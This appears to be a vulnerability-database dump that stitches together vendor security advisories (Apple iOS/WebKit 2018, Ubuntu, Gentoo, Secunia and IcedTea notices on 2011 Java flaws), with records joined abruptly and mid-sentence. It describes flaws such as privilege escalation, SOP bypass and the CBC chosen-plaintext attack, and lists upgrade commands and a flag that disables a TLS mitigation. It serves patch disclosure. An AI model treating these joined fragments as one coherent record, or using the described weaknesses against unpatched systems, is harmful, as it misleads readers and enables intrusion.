gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4156: Samuel GroA (@5aelo) Quick Look Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4157: Samuel GroA (@5aelo) Safari Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Visiting a malicious website by clicking a link may lead to user interface spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2018-4134: xisigr of Tencent's Xuanwu Lab (tencent.com), Zhiyang Zeng (@Wester) of Tencent Security Platform Department Safari Login AutoFill Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may be able to exfiltrate autofilled data in Safari without explicit user interaction. Description: Safari autofill did not require explicit user interaction before taking place. CVE-2018-4137: SafariViewController Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Visiting a malicious website may lead to user interface spoofing Description: A state management issue was addressed by disabling text input until the destination page loads. CVE-2018-4149: Abhinash Jain (@abhinashjain) Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved size validation. CVE-2018-4144: Abraham Masri (@cheesecakeufo) Storage Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4154: Samuel GroA (@5aelo) System Preferences Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A configuration profile may incorrectly remain in effect after removal Description: An issue existed in CFPreferences. CVE-2018-4115: Johann Thalakada, Vladimir Zubkov, and Matt Vlasach of Wandera Telephony Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A remote attacker can cause a device to unexpectedly restart Description: A null pointer dereference issue existed when handling Class 0 SMS messages. CVE-2018-4140: @mjonsson, Arjan van der Oest of Voiceworks BV Web App Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Cookies may unexpectedly persist in web app Description: A cookie management issue was addressed through improved state management. CVE-2018-4110: Ben Compton and Jason Colley of Cerner Corporation WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4146: found by OSS-Fuzz WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may exfiltrate data cross-origin Description: A cross-origin issue existed with the fetch API. CVE-2018-4117: an anonymous researcher, an anonymous researcher WindowServer Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An unprivileged application may be able to log keystrokes entered into other applications even when secure input mode is enabled Description: By scanning key states, an unprivileged application could log keystrokes entered into other applications even when secure input mode was enabled. CVE-2018-4131: Andreas Hegenberg of folivora.AI GmbH Additional recognition WebKit We would like to acknowledge Johnny Nipper of Tinder Security Team for their assistance. Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAlq9GlopHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEbhLRAA to9k0U/CI3PfYp2o2lluS7LgE3jvA7+pXvdjbvoh14BFHf9Wv+yhdtyLQEDSne+0 TM8BkiMgEmo+uKKcVFCDeV9GrkWqO7ocBfT65hj4A/vxPAS6xlBTV9mjZXiqvSWs +Cbb4Nd53o6m2QRORkjNVZ2h0ow53J5RirnyzjWt4LMdCpc4jMG87OCuQheKzjxq g6gOlwblVrRxH6aMX5if/SetGGxzZeY5sKwe1Xhz6yIYsm1Gw45REt3FJs4KEh5Z oL+yWVvaGLOPDzC+DBX0dXJmsqLx9wzDJsqQ2J6Mb/nh1Tgh6NDdHkDCAZ7P6CeU 0IpXK7aaPkRy5GUbkAdzdPEFql9e0/jGlqMf/rZlNTItbgtn0+9e2zsJ0UPPRcWi +7IQygkXnXmYUZ0wrh/Wdye/jAJZpLdsUuWr1RalTdmDASU/tzgpoglf3EyTQoRy IqFGRSe6+no8Pw1qCLUvZz8C6dTKvE+Jv5oe9XbCEjsvpRmQZK64FiQ0HIaAMHKo Rl9OY6+evzyqdAtivE4AFCRT7Z15pktFYAVefWkdVFbVU2mCYF+peXIq6tGg4o+g 70E29XaDZBakcVho9bW4e2rDA+m606ILuZ4AyjEEvfRYH+d+WTvDqdIywq0V7grj qlU787sRw/tVx646jcHVqbYZEgZVmeAvcT8C2c0Zhvo= =RJi8 -----END PGP SIGNATURE----- . ========================================================================== Ubuntu Security Notice USN-3635-1 April 30, 2018 webkit2gtk vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 17.10 - Ubuntu 16.04 LTS Summary: Several security issues were fixed in WebKitGTK+. Software Description: - webkit2gtk: Web content engine library for GTK+ Details: A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 17.10: libjavascriptcoregtk-4.0-18 2.20.1-0ubuntu0.17.10.1 libwebkit2gtk-4.0-37 2.20.1-0ubuntu0.17.10.1 Ubuntu 16.04 LTS: libjavascriptcoregtk-4.0-18 2.20.1-0ubuntu0.16.04.1 libwebkit2gtk-4.0-37 2.20.1-0ubuntu0.16.04.1 This update uses a new upstream release, which includes additional bug fixes. After a standard system update you need to restart any applications that use WebKitGTK+, such as Epiphany, to make all the necessary changes. References: https://usn.ubuntu.com/usn/usn-3635-1 CVE-2018-4101, CVE-2018-4113, CVE-2018-4114, CVE-2018-4117, CVE-2018-4118, CVE-2018-4119, CVE-2018-4120, CVE-2018-4122, CVE-2018-4125, CVE-2018-4127, CVE-2018-4128, CVE-2018-4129, CVE-2018-4133, CVE-2018-4146, CVE-2018-4161, CVE-2018-4162, CVE-2018-4163, CVE-2018-4165 Package Information: https://launchpad.net/ubuntu/+source/webkit2gtk/2.20.1-0ubuntu0.17.10.1 https://launchpad.net/ubuntu/+source/webkit2gtk/2.20.1-0ubuntu0.16.04.1 . Installation note: Safari 11.1 may be obtained from the Mac App Store
var-201110-0394 Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Networking. Oracle Java SE is prone to a remote vulnerability in Java Runtime Environment. The vulnerability can be exploited over multiple protocols. This issue affects the 'Networking' sub-component. This vulnerability affects the following supported versions: JDK and JRE 7, 6 Update 27, 5.0 Update 31, 1.4.2_33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Oracle JRE/JDK: Multiple vulnerabilities Date: November 05, 2011 Bugs: #340421, #354213, #370559, #387851 ID: 201111-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in the Oracle JRE/JDK, allowing attackers to cause unspecified impact. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-java/sun-jre-bin < 1.6.0.29 >= 1.6.0.29 * 2 app-emulation/emul-linux-x86-java < 1.6.0.29 >= 1.6.0.29 * 3 dev-java/sun-jdk < 1.6.0.29 >= 1.6.0.29 * ------------------------------------------------------------------- NOTE: Packages marked with asterisks require manual intervention! ------------------------------------------------------------------- 3 affected packages ------------------------------------------------------------------- Description =========== Multiple vulnerabilities have been reported in the Oracle Java implementation. Please review the CVE identifiers referenced below and the associated Oracle Critical Patch Update Advisory for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Oracle JDK 1.6 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-java/sun-jdk-1.6.0.29" All Oracle JRE 1.6 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-java/sun-jre-bin-1.6.0.29" All users of the precompiled 32-bit Oracle JRE 1.6 should upgrade to the latest version: # emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.6.0.29" NOTE: As Oracle has revoked the DLJ license for its Java implementation, the packages can no longer be updated automatically. This limitation is not present on a non-fetch restricted implementation such as dev-java/icedtea-bin. References ========== [ 1 ] CVE-2010-3541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541 [ 2 ] CVE-2010-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548 [ 3 ] CVE-2010-3549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549 [ 4 ] CVE-2010-3550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3550 [ 5 ] CVE-2010-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551 [ 6 ] CVE-2010-3552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3552 [ 7 ] CVE-2010-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553 [ 8 ] CVE-2010-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554 [ 9 ] CVE-2010-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3555 [ 10 ] CVE-2010-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3556 [ 11 ] CVE-2010-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557 [ 12 ] CVE-2010-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3558 [ 13 ] CVE-2010-3559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3559 [ 14 ] CVE-2010-3560 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3560 [ 15 ] CVE-2010-3561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561 [ 16 ] CVE-2010-3562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562 [ 17 ] CVE-2010-3563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3563 [ 18 ] CVE-2010-3565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565 [ 19 ] CVE-2010-3566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566 [ 20 ] CVE-2010-3567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567 [ 21 ] CVE-2010-3568 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568 [ 22 ] CVE-2010-3569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569 [ 23 ] CVE-2010-3570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3570 [ 24 ] CVE-2010-3571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3571 [ 25 ] CVE-2010-3572 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3572 [ 26 ] CVE-2010-3573 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573 [ 27 ] CVE-2010-3574 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574 [ 28 ] CVE-2010-4422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4422 [ 29 ] CVE-2010-4447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4447 [ 30 ] CVE-2010-4448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448 [ 31 ] CVE-2010-4450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450 [ 32 ] CVE-2010-4451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4451 [ 33 ] CVE-2010-4452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4452 [ 34 ] CVE-2010-4454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4454 [ 35 ] CVE-2010-4462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4462 [ 36 ] CVE-2010-4463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4463 [ 37 ] CVE-2010-4465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465 [ 38 ] CVE-2010-4466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4466 [ 39 ] CVE-2010-4467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467 [ 40 ] CVE-2010-4468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4468 [ 41 ] CVE-2010-4469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469 [ 42 ] CVE-2010-4470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470 [ 43 ] CVE-2010-4471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471 [ 44 ] CVE-2010-4472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472 [ 45 ] CVE-2010-4473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4473 [ 46 ] CVE-2010-4474 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4474 [ 47 ] CVE-2010-4475 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4475 [ 48 ] CVE-2010-4476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476 [ 49 ] CVE-2011-0802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0802 [ 50 ] CVE-2011-0814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0814 [ 51 ] CVE-2011-0815 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815 [ 52 ] CVE-2011-0862 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862 [ 53 ] CVE-2011-0863 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0863 [ 54 ] CVE-2011-0864 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864 [ 55 ] CVE-2011-0865 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865 [ 56 ] CVE-2011-0867 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0867 [ 57 ] CVE-2011-0868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868 [ 58 ] CVE-2011-0869 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869 [ 59 ] CVE-2011-0871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871 [ 60 ] CVE-2011-0872 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872 [ 61 ] CVE-2011-0873 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0873 [ 62 ] CVE-2011-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389 [ 63 ] CVE-2011-3516 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3516 [ 64 ] CVE-2011-3521 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521 [ 65 ] CVE-2011-3544 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544 [ 66 ] CVE-2011-3545 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3545 [ 67 ] CVE-2011-3546 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3546 [ 68 ] CVE-2011-3547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547 [ 69 ] CVE-2011-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548 [ 70 ] CVE-2011-3549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3549 [ 71 ] CVE-2011-3550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3550 [ 72 ] CVE-2011-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551 [ 73 ] CVE-2011-3552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552 [ 74 ] CVE-2011-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553 [ 75 ] CVE-2011-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554 [ 76 ] CVE-2011-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3555 [ 77 ] CVE-2011-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556 [ 78 ] CVE-2011-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557 [ 79 ] CVE-2011-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558 [ 80 ] CVE-2011-3560 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560 [ 81 ] CVE-2011-3561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3561 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool. Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/ ---------------------------------------------------------------------- TITLE: Hitachi Cosminexus Products Java Multiple Vulnerabilities SECUNIA ADVISORY ID: SA46694 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46694/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46694 RELEASE DATE: 2011-11-08 DISCUSS ADVISORY: http://secunia.com/advisories/46694/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46694/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46694 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Hitachi has acknowledged multiple vulnerabilities in Hitachi Cosminexus products, which can be exploited by malicious users to disclose certain information and by malicious people to disclose potentially sensitive information, hijack a user's session, conduct DNS cache poisoning attacks, manipulate certain data, cause a DoS (Denial of Service), and compromise a vulnerable system. The vulnerabilities are caused due to vulnerabilities in the bundled version of Cosminexus Developer's Kit for Java. For more information: SA46512 Please see the vendor's advisory for a list of affected products. Please see the vendor's advisory for details. ORIGINAL ADVISORY: http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS11-024/index.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Background ========== IcedTea is a distribution of the Java OpenJDK source code built with free build tools. This combines the two previous openjdk-6 advisories, DSA-2311-1 and DSA-2356-1. CVE-2011-0862 Integer overflow errors in the JPEG and font parser allow untrusted code (including applets) to elevate its privileges. CVE-2011-0864 Hotspot, the just-in-time compiler in OpenJDK, mishandled certain byte code instructions, allowing untrusted code (including applets) to crash the virtual machine. CVE-2011-0865 A race condition in signed object deserialization could allow untrusted code to modify signed content, apparently leaving its signature intact. CVE-2011-0867 Untrusted code (including applets) could access information about network interfaces which was not intended to be public. (Note that the interface MAC address is still available to untrusted code.) CVE-2011-0868 A float-to-long conversion could overflow, , allowing untrusted code (including applets) to crash the virtual machine. CVE-2011-0869 Untrusted code (including applets) could intercept HTTP requests by reconfiguring proxy settings through a SOAP connection. CVE-2011-0871 Untrusted code (including applets) could elevate its privileges through the Swing MediaTracker code. CVE-2011-3547 The skip() method in java.io.InputStream uses a shared buffer, allowing untrusted Java code (such as applets) to access data that is skipped by other code. CVE-2011-3551 The Java2D C code contains an integer overflow which results in a heap-based buffer overflow, potentially allowing untrusted Java code (such as applets) to elevate its privileges. CVE-2011-3553 JAX-WS enables stack traces for certain server responses by default, potentially leaking sensitive information. CVE-2011-3560 The com.sun.net.ssl.HttpsURLConnection class does not perform proper security manager checks in the setSSLSocketFactory() method, allowing untrusted Java code to bypass security policy restrictions. For the oldstable distribution (lenny), these problems have been fixed in version 6b18-1.8.10-0~lenny1. ========================================================================== Ubuntu Security Notice USN-1263-1 November 16, 2011 icedtea-web, openjdk-6, openjdk-6b18 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: Multiple OpenJDK 6 and IcedTea-Web vulnerabilities have been fixed. Software Description: - icedtea-web: A web browser plugin to execute Java applets - openjdk-6: Open Source Java implementation - openjdk-6b18: Open Source Java implementation Details: Deepak Bhole discovered a flaw in the Same Origin Policy (SOP) implementation in the IcedTea web browser plugin. This could allow a remote attacker to open connections to certain hosts that should not be permitted. (CVE-2011-3377) Juliano Rizzo and Thai Duong discovered that the block-wise AES encryption algorithm block-wise as used in TLS/SSL was vulnerable to a chosen-plaintext attack. This could allow a remote attacker to view confidential data. (CVE-2011-3389) It was discovered that a type confusion flaw existed in the in the Internet Inter-Orb Protocol (IIOP) deserialization code. A remote attacker could use this to cause an untrusted application or applet to execute arbitrary code by deserializing malicious input. (CVE-2011-3521) It was discovered that the Java scripting engine did not perform SecurityManager checks. This could allow a remote attacker to cause an untrusted application or applet to execute arbitrary code with the full privileges of the JVM. (CVE-2011-3544) It was discovered that the InputStream class used a global buffer to store input bytes skipped. An attacker could possibly use this to gain access to sensitive information. (CVE-2011-3547) It was discovered that a vulnerability existed in the AWTKeyStroke class. A remote attacker could cause an untrusted application or applet to execute arbitrary code. (CVE-2011-3548) It was discovered that an integer overflow vulnerability existed in the TransformHelper class in the Java2D implementation. A remote attacker could use this cause a denial of service via an application or applet crash or possibly execute arbitrary code. (CVE-2011-3551) It was discovered that the default number of available UDP sockets for applications running under SecurityManager restrictions was set too high. A remote attacker could use this with a malicious application or applet exhaust the number of available UDP sockets to cause a denial of service for other applets or applications running within the same JVM. (CVE-2011-3552) It was discovered that Java API for XML Web Services (JAX-WS) could incorrectly expose a stack trace. A remote attacker could potentially use this to gain access to sensitive information. (CVE-2011-3553) It was discovered that the unpacker for pack200 JAR files did not sufficiently check for errors. An attacker could cause a denial of service or possibly execute arbitrary code through a specially crafted pack200 JAR file. (CVE-2011-3554) It was discovered that the RMI registration implementation did not properly restrict privileges of remotely executed code. A remote attacker could use this to execute code with elevated privileges. (CVE-2011-3556, CVE-2011-3557) It was discovered that the HotSpot VM could be made to crash, allowing an attacker to cause a denial of service or possibly leak sensitive information. (CVE-2011-3558) It was discovered that the HttpsURLConnection class did not properly perform SecurityManager checks in certain situations. This could allow a remote attacker to bypass restrictions on HTTPS connections. (CVE-2011-3560) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: icedtea-6-jre-cacao 6b23~pre11-0ubuntu1.11.10 icedtea-6-jre-jamvm 6b23~pre11-0ubuntu1.11.10 icedtea-netx 1.1.3-1ubuntu1.1 icedtea-plugin 1.1.3-1ubuntu1.1 openjdk-6-jre 6b23~pre11-0ubuntu1.11.10 openjdk-6-jre-headless 6b23~pre11-0ubuntu1.11.10 openjdk-6-jre-lib 6b23~pre11-0ubuntu1.11.10 openjdk-6-jre-zero 6b23~pre11-0ubuntu1.11.10 Ubuntu 11.04: icedtea-6-jre-cacao 6b22-1.10.4-0ubuntu1~11.04.1 icedtea-6-jre-jamvm 6b22-1.10.4-0ubuntu1~11.04.1 icedtea-netx 1.1.1-0ubuntu1~11.04.2 icedtea-plugin 1.1.1-0ubuntu1~11.04.2 openjdk-6-jre 6b22-1.10.4-0ubuntu1~11.04.1 openjdk-6-jre-headless 6b22-1.10.4-0ubuntu1~11.04.1 openjdk-6-jre-lib 6b22-1.10.4-0ubuntu1~11.04.1 openjdk-6-jre-zero 6b22-1.10.4-0ubuntu1~11.04.1 Ubuntu 10.10: icedtea-6-jre-cacao 6b20-1.9.10-0ubuntu1~10.10.2 openjdk-6-demo 6b20-1.9.10-0ubuntu1~10.10.2 openjdk-6-jdk 6b20-1.9.10-0ubuntu1~10.10.2 openjdk-6-jre 6b20-1.9.10-0ubuntu1~10.10.2 openjdk-6-jre-headless 6b20-1.9.10-0ubuntu1~10.10.2 openjdk-6-jre-lib 6b20-1.9.10-0ubuntu1~10.10.2 openjdk-6-jre-zero 6b20-1.9.10-0ubuntu1~10.10.2 Ubuntu 10.04 LTS: icedtea-6-jre-cacao 6b20-1.9.10-0ubuntu1~10.04.2 icedtea6-plugin 6b20-1.9.10-0ubuntu1~10.04.2 openjdk-6-demo 6b20-1.9.10-0ubuntu1~10.04.2 openjdk-6-jre 6b20-1.9.10-0ubuntu1~10.04.2 openjdk-6-jre-headless 6b20-1.9.10-0ubuntu1~10.04.2 openjdk-6-jre-lib 6b20-1.9.10-0ubuntu1~10.04.2 openjdk-6-jre-zero 6b20-1.9.10-0ubuntu1~10.04.2 After a standard system update you need to restart any Java applications or applets to make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1263-1 CVE-2011-3377, CVE-2011-3389, CVE-2011-3521, CVE-2011-3544, CVE-2011-3547, CVE-2011-3548, CVE-2011-3551, CVE-2011-3552, CVE-2011-3553, CVE-2011-3554, CVE-2011-3556, CVE-2011-3557, CVE-2011-3558, CVE-2011-3560 Package Information: https://launchpad.net/ubuntu/+source/icedtea-web/1.1.3-1ubuntu1.1 https://launchpad.net/ubuntu/+source/openjdk-6/6b23~pre11-0ubuntu1.11.10 https://launchpad.net/ubuntu/+source/icedtea-web/1.1.1-0ubuntu1~11.04.2 https://launchpad.net/ubuntu/+source/openjdk-6/6b22-1.10.4-0ubuntu1~11.04.1 https://launchpad.net/ubuntu/+source/openjdk-6b18/6b18-1.8.10-0ubuntu1~11.04.1 https://launchpad.net/ubuntu/+source/openjdk-6/6b20-1.9.10-0ubuntu1~10.10.2 https://launchpad.net/ubuntu/+source/openjdk-6b18/6b18-1.8.10-0ubuntu1~10.10.2 https://launchpad.net/ubuntu/+source/openjdk-6/6b20-1.9.10-0ubuntu1~10.04.2 https://launchpad.net/ubuntu/+source/openjdk-6b18/6b18-1.8.10-0ubuntu1~10.04.2 . IcedTea6 prior to 1.10.4 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D (CVE-2011-3551). IcedTea6 prior to 1.10.4 allows remote attackers to affect integrity via unknown vectors related to Networking (CVE-2011-3552). IcedTea6 prior to 1.10.4 allows remote authenticated users to affect confidentiality, related to JAXWS (CVE-2011-3553). A flaw was found in the way the SSL 3 and TLS 1.0 protocols used block ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a chosen plain text attack against a connection mixing trusted and untrusted data could use this flaw to recover portions of the trusted data sent over the connection (CVE-2011-3389). Note: This update mitigates the CVE-2011-3389 issue by splitting the first application data record byte to a separate SSL/TLS protocol record. This mitigation may cause compatibility issues with some SSL/TLS implementations and can be disabled using the jsse.enableCBCProtection boolean property. This can be done on the command line by appending the flag -Djsse.enableCBCProtection=false to the java command. IcedTea6 prior to 1.10.4 allows remote attackers to affect confidentiality, integrity, and availability, related to RMI (CVE-2011-3556). IcedTea6 prior to 1.10.4 allows remote attackers to affect confidentiality, integrity, and availability, related to RMI (CVE-2011-3557). A malicious applet could use this flaw to bypass SOP protection and open connections to any sub-domain of the second-level domain of the applet&#039;s origin, as well as any sub-domain of the domain that is the suffix of the origin second-level domain. For example, IcedTea-Web plugin allowed applet from some.host.example.com to connect to other.host.example.com, www.example.com, and example.com, as well as www.ample.com or ample.com. (CVE-2011-3377). _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3547 